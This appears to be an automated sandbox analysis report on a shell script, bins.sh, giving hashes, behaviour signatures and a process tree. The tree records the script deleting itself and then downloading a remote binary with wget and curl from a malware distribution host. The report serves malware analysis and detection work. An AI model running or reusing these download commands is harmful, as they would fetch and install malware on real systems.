Analysis

  • max time kernel
    149s
  • max time network
    8s
  • platform
    debian-9_armhf
  • resource
    debian9-armhf-20240611-en
  • resource tags

    arch:armhf image:debian9-armhf-20240611-en kernel:4.9.0-13-armmp-lpae locale:en-us os:debian-9-armhf system
  • submitted
    28-10-2024 02:33

General

  • Target

    bins.sh

  • Size

    10KB

  • MD5

    983c1aa3002db7f82617b43cd659c581

  • SHA1

    a4ed5b9527c45f8fd2926606512bf3fae46a8380

  • SHA256

    7ac05c613144c5e909cdf1cd4d39f6445cc999325f50bce1e855f19898bef53e

  • SHA512

    fcbd08abb414f0d1f3646716b05cbe474c72be6c996655a22929a8e1e301683dc6c77b909137408dd0daa0c9420bf9eb68102a16ec7cbbaab28f1bb9b349fbd5

  • SSDEEP

    192:0cW/YP+yrXApp3eK9Xk8RrXAppreK9Xk8oY:0cW/YmteK9Xk86eK9Xk89

Score
4/10

Malware Config

Signatures

  • Checks CPU configuration (1 TTPs, 1 IoCs)

    Checks CPU information, which indicates whether the system is a virtual machine.

  • Reads runtime system information (2 IoCs)

    Reads data from the /proc virtual filesystem.

  • System Network Configuration Discovery (1 TTPs, 2 IoCs)

    Adversaries may gather information about the network configuration of a system.

Processes

  • /tmp/bins.sh
    /tmp/bins.sh
    1⤵
      PID:644
      • /bin/rm
        /bin/rm bins.sh
        2⤵
          PID:649
        • /usr/bin/wget
          wget http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR
          2⤵
          • System Network Configuration Discovery
          PID:652
        • /usr/bin/curl
          curl -O http://conn.masjesu.zip/bins/EuyepLNebPXoa5I6eLHWnxUhUkLg8RnTzR
          2⤵
          • Checks CPU configuration
          • Reads runtime system information
          • System Network Configuration Discovery
          PID:658
